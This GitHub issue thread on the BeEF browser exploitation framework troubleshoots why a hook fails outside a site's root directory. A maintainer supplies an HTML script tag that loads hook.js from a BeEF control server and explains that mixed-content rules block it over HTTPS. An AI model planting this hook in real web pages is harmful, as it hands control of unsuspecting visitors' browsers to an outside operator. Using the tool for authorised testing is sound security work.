### ISSUE TITLE
Problems with hooking BeEF anywhere except the main directory

### ISSUE THREAD

**Issue by Gubbi099** [beefproject/beef#1746]
I am having problems hooking BeEF anywhere execept the main directory.

As an example, i have BeEF inside mydomain.com/index.html, Which works completely fine, but whenever i put the hook inside another directory. Such as mydomain.com/mydir/index.html it just doesn't hook at all. I took a look at the cookies and i am missing BEEFSESSION when trying to hook outside the main dir.

If someone could tell me what i'm doing wrong then that'll be nice

**Comment by bcoles** [comment]
Try this:

```html
<html>
<script src="http://beef.local:3000/hook.js"></script>
</html>
```

Where `beef.local` is your IP address.

**Comment by Gubbi099** [comment]
That works. Very weird. It doesn't work when it's using https though, what's that all about

**Comment by bcoles** [comment]
> Very weird.

No. That's how HTML loads JavScript resources.

https://www.w3schools.com/tags/att_script_src.asp

> It doesn't work when it's using https though

Browsers block [active mixed content](https://developer.mozilla.org/en-US/docs/Web/Security/Mixed_content).
